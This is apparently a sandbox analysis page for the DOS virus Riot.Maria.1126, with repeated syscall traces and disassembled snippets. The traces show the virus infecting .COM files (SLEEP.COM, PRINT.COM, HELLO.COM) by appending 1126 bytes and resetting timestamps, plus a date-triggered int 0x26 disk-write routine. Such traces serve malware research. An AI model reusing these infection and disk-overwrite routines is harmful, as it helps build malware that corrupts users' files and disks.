Sample viewer

vx.netlux.org/Virus.DOS.Riot.Maria.1126

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:07:59.920025955Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2
0x12a5d: je 0x12a62
0x12a5f: jmp 0x12a80
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2
0x12a65: cdq
0x12a66: mov cx, 0x100
0x12a69: int 0x26
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3
0x12a71: mov cx, 0x2bc
0x12a74: mov dx, 0
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]
2018-12-17T23:07:59.923486954Z 71 PC: 12b49 | Get current directory
2018-12-17T23:07:59.927534131Z 59 PC: 12b54 | Change current directory
2018-12-17T23:07:59.932427691Z 26 PC: 12c08 | Set disk transfer address
2018-12-17T23:07:59.934549001Z 78 PC: 12c16 | Find first file
2018-12-17T23:07:59.942284103Z 61 PC: 12c42 | Open file (Filename = 'SLEEP.COM')
2018-12-17T23:07:59.949932135Z 63 PC: 12c54 | Read file or device (Read 8 bytes on handle 5)
2018-12-17T23:07:59.957457433Z 44 PC: 12c8e | Get time 0x12c8e: add dl, dh
0x12c90: je 0x12c8a
0x12c92: mov si, 0x115
0x12c95: add si, word ptr [0x106]
0x12c99: mov byte ptr [si], dl
0x12c9b: mov ax, 0x4301
0x12c9e: xor cx, cx
0x12ca0: mov dx, si
0x12ca2: add dx, 0xca
0x12ca6: int 0x21
0x12ca8: mov ah, 0x3e
0x12caa: int 0x21
0x12cac: mov ax, 0x3d02
0x12caf: int 0x21
0x12cb1: jb 0x12c63
0x12cb3: mov di, dx
0x12cb5: add di, 0x63
0x12cb8: stosw word ptr es:[di], ax
0x12cb9: xchg ax, bx
0x12cba: mov ah, 0x40
2018-12-17T23:07:59.961848058Z 67 PC: 12ca8 | Get or set file attributes
2018-12-17T23:07:59.983866779Z 62 PC: 12cac | Close file
2018-12-17T23:07:59.986247916Z 61 PC: 12cb1 | Open file (Filename = 'SLEEP.COM')
2018-12-17T23:07:59.995060874Z 64 PC: 12cc4 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:08:00.003341855Z 64 PC: 12cd6 | Write file or device (Write 2 bytes on handle 5)
2018-12-17T23:08:00.006801903Z 64 PC: 12ceb | Write file or device (Write 2 bytes on handle 5)
2018-12-17T23:08:00.009728369Z 66 PC: 12cf4 | Move file pointer
2018-12-17T23:08:00.01254735Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2
0x12a5d: je 0x12a62
0x12a5f: jmp 0x12a80
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2
0x12a65: cdq
0x12a66: mov cx, 0x100
0x12a69: int 0x26
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3
0x12a71: mov cx, 0x2bc
0x12a74: mov dx, 0
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]
2018-12-17T23:08:00.015922888Z 64 PC: 12a98 | Write file or device (Write 1126 bytes on handle 5)
2018-12-17T23:08:00.025530773Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2
0x12a5d: je 0x12a62
0x12a5f: jmp 0x12a80
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2
0x12a65: cdq
0x12a66: mov cx, 0x100
0x12a69: int 0x26
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3
0x12a71: mov cx, 0x2bc
0x12a74: mov dx, 0
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]
2018-12-17T23:08:00.02879481Z 87 PC: 12d0d | Get or set file date and time
2018-12-17T23:08:00.03030625Z 62 PC: 12d11 | Close file
2018-12-17T23:08:00.039036219Z 67 PC: 12d22 | Get or set file attributes
2018-12-17T23:08:00.052354786Z 79 PC: 12c2a | Find next file
2018-12-17T23:08:00.055392517Z 61 PC: 12c42 | Open file (Filename = 'PRINT.COM')
2018-12-17T23:08:00.063933777Z 63 PC: 12c54 | Read file or device (Read 8 bytes on handle 5)
2018-12-17T23:08:00.080681348Z 44 PC: 12c8e | Get time 0x12c8e: add dl, dh
0x12c90: je 0x12c8a
0x12c92: mov si, 0x115
0x12c95: add si, word ptr [0x106]
0x12c99: mov byte ptr [si], dl
0x12c9b: mov ax, 0x4301
0x12c9e: xor cx, cx
0x12ca0: mov dx, si
0x12ca2: add dx, 0xca
0x12ca6: int 0x21
0x12ca8: mov ah, 0x3e
0x12caa: int 0x21
0x12cac: mov ax, 0x3d02
0x12caf: int 0x21
0x12cb1: jb 0x12c63
0x12cb3: mov di, dx
0x12cb5: add di, 0x63
0x12cb8: stosw word ptr es:[di], ax
0x12cb9: xchg ax, bx
0x12cba: mov ah, 0x40
2018-12-17T23:08:00.08478417Z 67 PC: 12ca8 | Get or set file attributes
2018-12-17T23:08:00.096852139Z 62 PC: 12cac | Close file
2018-12-17T23:08:00.100158406Z 61 PC: 12cb1 | Open file (Filename = 'PRINT.COM')
2018-12-17T23:08:00.10870953Z 64 PC: 12cc4 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:08:00.111912005Z 64 PC: 12cd6 | Write file or device (Write 2 bytes on handle 5)
2018-12-17T23:08:00.115507492Z 64 PC: 12ceb | Write file or device (Write 2 bytes on handle 5)
2018-12-17T23:08:00.119189969Z 66 PC: 12cf4 | Move file pointer
2018-12-17T23:08:00.121277475Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2
0x12a5d: je 0x12a62
0x12a5f: jmp 0x12a80
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2
0x12a65: cdq
0x12a66: mov cx, 0x100
0x12a69: int 0x26
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3
0x12a71: mov cx, 0x2bc
0x12a74: mov dx, 0
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]
2018-12-17T23:08:00.124222916Z 64 PC: 12a98 | Write file or device (Write 1126 bytes on handle 5)
2018-12-17T23:08:00.134969847Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2
0x12a5d: je 0x12a62
0x12a5f: jmp 0x12a80
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2
0x12a65: cdq
0x12a66: mov cx, 0x100
0x12a69: int 0x26
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3
0x12a71: mov cx, 0x2bc
0x12a74: mov dx, 0
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]
2018-12-17T23:08:00.137515674Z 87 PC: 12d0d | Get or set file date and time
2018-12-17T23:08:00.139300933Z 62 PC: 12d11 | Close file
2018-12-17T23:08:00.148472693Z 67 PC: 12d22 | Get or set file attributes
2018-12-17T23:08:00.159494534Z 79 PC: 12c2a | Find next file
2018-12-17T23:08:00.162513587Z 61 PC: 12c42 | Open file (Filename = 'HELLO.COM')
2018-12-17T23:08:00.170280713Z 63 PC: 12c54 | Read file or device (Read 8 bytes on handle 5)
2018-12-17T23:08:00.178256113Z 44 PC: 12c8e | Get time 0x12c8e: add dl, dh
0x12c90: je 0x12c8a
0x12c92: mov si, 0x115
0x12c95: add si, word ptr [0x106]
0x12c99: mov byte ptr [si], dl
0x12c9b: mov ax, 0x4301
0x12c9e: xor cx, cx
0x12ca0: mov dx, si
0x12ca2: add dx, 0xca
0x12ca6: int 0x21
0x12ca8: mov ah, 0x3e
0x12caa: int 0x21
0x12cac: mov ax, 0x3d02
0x12caf: int 0x21
0x12cb1: jb 0x12c63
0x12cb3: mov di, dx
0x12cb5: add di, 0x63
0x12cb8: stosw word ptr es:[di], ax
0x12cb9: xchg ax, bx
0x12cba: mov ah, 0x40
2018-12-17T23:08:00.181049791Z 67 PC: 12ca8 | Get or set file attributes
2018-12-17T23:08:00.193170539Z 62 PC: 12cac | Close file
2018-12-17T23:08:00.195246247Z 61 PC: 12cb1 | Open file (Filename = 'HELLO.COM')
2018-12-17T23:08:00.202832312Z 64 PC: 12cc4 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:08:00.206697142Z 64 PC: 12cd6 | Write file or device (Write 2 bytes on handle 5)
2018-12-17T23:08:00.209657454Z 64 PC: 12ceb | Write file or device (Write 2 bytes on handle 5)
2018-12-17T23:08:00.212594155Z 66 PC: 12cf4 | Move file pointer
2018-12-17T23:08:00.2153309Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2
0x12a5d: je 0x12a62
0x12a5f: jmp 0x12a80
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2
0x12a65: cdq
0x12a66: mov cx, 0x100
0x12a69: int 0x26
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3
0x12a71: mov cx, 0x2bc
0x12a74: mov dx, 0
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]
2018-12-17T23:08:00.217784264Z 64 PC: 12a98 | Write file or device (Write 1126 bytes on handle 5)
2018-12-17T23:08:00.228104406Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2
0x12a5d: je 0x12a62
0x12a5f: jmp 0x12a80
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2
0x12a65: cdq
0x12a66: mov cx, 0x100
0x12a69: int 0x26
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3
0x12a71: mov cx, 0x2bc
0x12a74: mov dx, 0
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]
2018-12-17T23:08:00.232443621Z 87 PC: 12d0d | Get or set file date and time
2018-12-17T23:08:00.23468396Z 62 PC: 12d11 | Close file
2018-12-17T23:08:00.244328278Z 67 PC: 12d22 | Get or set file attributes
2018-12-17T23:08:00.255522387Z 42 PC: 12b6f | Get date 0x12b6f: cmp dx, 0x606
0x12b73: je 0x12b78
0x12b75: jmp 0x12d94
0x12b78: jmp 0x12d28
0x12b7b: and ah, bh
0x12b7d: movsw word ptr es:[di], word ptr [si]
0x12b7e: mov ax, 0x5c4c
0x12b81: add word ptr [di], ax
0x12b83: add byte ptr [di - 0x75], dl
0x12b86: in al, dx
0x12b87: sub sp, 0x2c
0x12b8a: push si
0x12b8b: jmp 0x12bfd
0x12b8d: nop
0x12b8e: mov ah, 0x1a
0x12b90: lea dx, word ptr [bp - 0x2c]
0x12b93: int 0x21
0x12b95: mov ah, 0x4e
0x12b97: mov cx, 0x10
0x12b9a: mov dx, 0x1b8
2018-12-17T23:08:00.259166903Z 59 PC: 12d9f | Change current directory
2018-12-17T23:08:00.263992593Z 59 PC: 12da6 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":16046,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:45:11.431000076Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2
0x12a5d: je 0x12a62
0x12a5f: jmp 0x12a80
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2
0x12a65: cdq
0x12a66: mov cx, 0x100
0x12a69: int 0x26
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3
0x12a71: mov cx, 0x2bc
0x12a74: mov dx, 0
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]
2018-12-25T12:45:11.43354652Z 71 PC: 12b49 | Get current directory
2018-12-25T12:45:11.436232435Z 59 PC: 12b54 | Change current directory
2018-12-25T12:45:11.44004911Z 26 PC: 12c08 | Set disk transfer address
2018-12-25T12:45:11.44143219Z 78 PC: 12c16 | Find first file
2018-12-25T12:45:11.447218341Z 61 PC: 12c42 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:45:11.453417499Z 63 PC: 12c54 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:45:11.467009027Z 44 PC: 12c8e | Get time 0x12c8e: add dl, dh
0x12c90: je 0x12c8a
0x12c92: mov si, 0x115
0x12c95: add si, word ptr [0x106]
0x12c99: mov byte ptr [si], dl
0x12c9b: mov ax, 0x4301
0x12c9e: xor cx, cx
0x12ca0: mov dx, si
0x12ca2: add dx, 0xca
0x12ca6: int 0x21
0x12ca8: mov ah, 0x3e
0x12caa: int 0x21
0x12cac: mov ax, 0x3d02
0x12caf: int 0x21
0x12cb1: jb 0x12c63
0x12cb3: mov di, dx
0x12cb5: add di, 0x63
0x12cb8: stosw word ptr es:[di], ax
0x12cb9: xchg ax, bx
0x12cba: mov ah, 0x40
2018-12-25T12:45:11.469250547Z 67 PC: 12ca8 | Get or set file attributes
2018-12-25T12:45:12.58704343Z 62 PC: 12cac | Close file
2018-12-25T12:45:12.590349125Z 61 PC: 12cb1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:45:12.596931829Z 64 PC: 12cc4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:45:12.7169035Z 64 PC: 12cd6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:45:12.719476841Z 64 PC: 12ceb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:45:12.722207257Z 66 PC: 12cf4 | Move file pointer
2018-12-25T12:45:12.723615077Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:12.725813637Z 64 PC: 12a98 | Write file or device (Write 1126 bytes on handle 5)
2018-12-25T12:45:12.844259131Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:12.846253287Z 87 PC: 12d0d | Get or set file date and time
2018-12-25T12:45:12.847286824Z 62 PC: 12d11 | Close file
2018-12-25T12:45:12.910183804Z 67 PC: 12d22 | Get or set file attributes
2018-12-25T12:45:12.980741088Z 79 PC: 12c2a | Find next file
2018-12-25T12:45:12.983954828Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:45:12.991822718Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:45:12.998337974Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:45:13.000834252Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:45:13.050196834Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:45:13.052401475Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:45:13.058700267Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:45:13.061449945Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:45:13.064204706Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:45:13.06661999Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:45:13.068055115Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:13.070459398Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:45:13.120385981Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:13.122629424Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:45:13.124440951Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:45:13.182597693Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:45:13.471176235Z 79 PC: 12c2a | Find next file (See above)
2018-12-25T12:45:13.474324038Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:45:13.480729948Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:45:13.584453206Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:45:13.588114245Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:45:13.754334731Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:45:13.756688578Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:45:13.764719545Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:45:13.767424871Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:45:13.769868663Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:45:13.773262929Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:45:13.774818126Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:13.776994467Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:45:13.853742968Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:13.855802695Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:45:13.857229075Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:45:13.986042465Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:45:14.179460225Z 42 PC: 12b6f | Get date 0x12b6f: cmp dx, 0x606
0x12b73: je 0x12b78
0x12b75: jmp 0x12d94
0x12b78: jmp 0x12d28
0x12b7b: and ah, bh
0x12b7d: movsw word ptr es:[di], word ptr [si]
0x12b7e: mov ax, 0x5c4c
0x12b81: add word ptr [di], ax
0x12b83: add byte ptr [di - 0x75], dl
0x12b86: in al, dx
0x12b87: sub sp, 0x2c
0x12b8a: push si
0x12b8b: jmp 0x12bfd
0x12b8d: nop
0x12b8e: mov ah, 0x1a
0x12b90: lea dx, word ptr [bp - 0x2c]
0x12b93: int 0x21
0x12b95: mov ah, 0x4e
0x12b97: mov cx, 0x10
0x12b9a: mov dx, 0x1b8
2018-12-25T12:45:14.181549114Z 59 PC: 12d9f | Change current directory
2018-12-25T12:45:14.186388732Z 59 PC: 12da6 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":16046,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:45:11.448739371Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2
0x12a5d: je 0x12a62
0x12a5f: jmp 0x12a80
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2
0x12a65: cdq
0x12a66: mov cx, 0x100
0x12a69: int 0x26
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3
0x12a71: mov cx, 0x2bc
0x12a74: mov dx, 0
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]
2018-12-25T12:45:11.451259969Z 71 PC: 12b49 | Get current directory
2018-12-25T12:45:11.453921313Z 59 PC: 12b54 | Change current directory
2018-12-25T12:45:11.457654581Z 26 PC: 12c08 | Set disk transfer address
2018-12-25T12:45:11.458983285Z 78 PC: 12c16 | Find first file
2018-12-25T12:45:11.469568848Z 61 PC: 12c42 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:45:11.480774279Z 63 PC: 12c54 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:45:11.487279638Z 44 PC: 12c8e | Get time 0x12c8e: add dl, dh
0x12c90: je 0x12c8a
0x12c92: mov si, 0x115
0x12c95: add si, word ptr [0x106]
0x12c99: mov byte ptr [si], dl
0x12c9b: mov ax, 0x4301
0x12c9e: xor cx, cx
0x12ca0: mov dx, si
0x12ca2: add dx, 0xca
0x12ca6: int 0x21
0x12ca8: mov ah, 0x3e
0x12caa: int 0x21
0x12cac: mov ax, 0x3d02
0x12caf: int 0x21
0x12cb1: jb 0x12c63
0x12cb3: mov di, dx
0x12cb5: add di, 0x63
0x12cb8: stosw word ptr es:[di], ax
0x12cb9: xchg ax, bx
0x12cba: mov ah, 0x40
2018-12-25T12:45:11.489283957Z 67 PC: 12ca8 | Get or set file attributes
2018-12-25T12:45:12.587139124Z 62 PC: 12cac | Close file
2018-12-25T12:45:12.589759003Z 61 PC: 12cb1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:45:12.596701663Z 64 PC: 12cc4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:45:12.599631733Z 64 PC: 12cd6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:45:12.602425182Z 64 PC: 12ceb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:45:12.606481378Z 66 PC: 12cf4 | Move file pointer
2018-12-25T12:45:12.607989271Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:12.610626209Z 64 PC: 12a98 | Write file or device (Write 1126 bytes on handle 5)
2018-12-25T12:45:12.790363419Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:12.793685915Z 87 PC: 12d0d | Get or set file date and time
2018-12-25T12:45:12.795497961Z 62 PC: 12d11 | Close file
2018-12-25T12:45:12.88098556Z 67 PC: 12d22 | Get or set file attributes
2018-12-25T12:45:12.951078447Z 79 PC: 12c2a | Find next file
2018-12-25T12:45:12.95376309Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:45:12.960520402Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:45:12.967520266Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:45:12.969525875Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:45:13.018256743Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:45:13.02033923Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:45:13.026772555Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:45:13.029788747Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:45:13.03199923Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:45:13.033859467Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:45:13.03539844Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:13.037076646Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:45:13.084977251Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:13.086981965Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:45:13.088142021Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:45:13.141839258Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:45:13.250137126Z 79 PC: 12c2a | Find next file (See above)
2018-12-25T12:45:13.252991055Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:45:13.264179267Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:45:13.270183661Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:45:13.272515718Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:45:13.47038104Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:45:13.472161513Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:45:13.479210115Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:45:13.481683373Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:45:13.484247032Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:45:13.487587529Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:45:13.488851526Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:13.490828736Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:45:13.646896857Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:13.648983977Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:45:13.650306684Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:45:13.825964458Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:45:13.948797606Z 42 PC: 12b6f | Get date 0x12b6f: cmp dx, 0x606
0x12b73: je 0x12b78
0x12b75: jmp 0x12d94
0x12b78: jmp 0x12d28
0x12b7b: and ah, bh
0x12b7d: movsw word ptr es:[di], word ptr [si]
0x12b7e: mov ax, 0x5c4c
0x12b81: add word ptr [di], ax
0x12b83: add byte ptr [di - 0x75], dl
0x12b86: in al, dx
0x12b87: sub sp, 0x2c
0x12b8a: push si
0x12b8b: jmp 0x12bfd
0x12b8d: nop
0x12b8e: mov ah, 0x1a
0x12b90: lea dx, word ptr [bp - 0x2c]
0x12b93: int 0x21
0x12b95: mov ah, 0x4e
0x12b97: mov cx, 0x10
0x12b9a: mov dx, 0x1b8
2018-12-25T12:45:13.950842834Z 59 PC: 12d9f | Change current directory
2018-12-25T12:45:13.955025756Z 59 PC: 12da6 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":16046,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:45:11.699092429Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2
0x12a5d: je 0x12a62
0x12a5f: jmp 0x12a80
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2
0x12a65: cdq
0x12a66: mov cx, 0x100
0x12a69: int 0x26
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3
0x12a71: mov cx, 0x2bc
0x12a74: mov dx, 0
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]
2018-12-25T12:45:11.702691386Z 71 PC: 12b49 | Get current directory
2018-12-25T12:45:11.704641766Z 59 PC: 12b54 | Change current directory
2018-12-25T12:45:11.70724452Z 26 PC: 12c08 | Set disk transfer address
2018-12-25T12:45:11.708472158Z 78 PC: 12c16 | Find first file
2018-12-25T12:45:11.712374701Z 61 PC: 12c42 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:45:11.716448498Z 63 PC: 12c54 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:45:11.720596906Z 44 PC: 12c8e | Get time 0x12c8e: add dl, dh
0x12c90: je 0x12c8a
0x12c92: mov si, 0x115
0x12c95: add si, word ptr [0x106]
0x12c99: mov byte ptr [si], dl
0x12c9b: mov ax, 0x4301
0x12c9e: xor cx, cx
0x12ca0: mov dx, si
0x12ca2: add dx, 0xca
0x12ca6: int 0x21
0x12ca8: mov ah, 0x3e
0x12caa: int 0x21
0x12cac: mov ax, 0x3d02
0x12caf: int 0x21
0x12cb1: jb 0x12c63
0x12cb3: mov di, dx
0x12cb5: add di, 0x63
0x12cb8: stosw word ptr es:[di], ax
0x12cb9: xchg ax, bx
0x12cba: mov ah, 0x40
2018-12-25T12:45:11.722453122Z 67 PC: 12ca8 | Get or set file attributes
2018-12-25T12:45:11.739733156Z 62 PC: 12cac | Close file
2018-12-25T12:45:11.741604976Z 61 PC: 12cb1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:45:11.749090688Z 64 PC: 12cc4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:45:11.752127893Z 64 PC: 12cd6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:45:11.755060438Z 64 PC: 12ceb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:45:11.75858009Z 66 PC: 12cf4 | Move file pointer
2018-12-25T12:45:11.759706333Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:11.761253994Z 64 PC: 12a98 | Write file or device (Write 1126 bytes on handle 5)
2018-12-25T12:45:11.767428729Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:11.769802216Z 87 PC: 12d0d | Get or set file date and time
2018-12-25T12:45:11.771326904Z 62 PC: 12d11 | Close file
2018-12-25T12:45:11.780991552Z 67 PC: 12d22 | Get or set file attributes
2018-12-25T12:45:11.791255189Z 79 PC: 12c2a | Find next file
2018-12-25T12:45:11.793873173Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:45:11.801622566Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:45:11.808305756Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:45:11.810428368Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:45:11.821937359Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:45:11.823900377Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:45:11.831224068Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:45:11.834567024Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:45:11.838106046Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:45:11.840825391Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:45:11.84249507Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:11.845157755Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:45:11.854719033Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:11.856996814Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:45:11.858548955Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:45:11.866631554Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:45:11.876892193Z 79 PC: 12c2a | Find next file (See above)
2018-12-25T12:45:11.880122874Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:45:11.886946538Z 63 PC: 12c54 | Read file or device (See above)
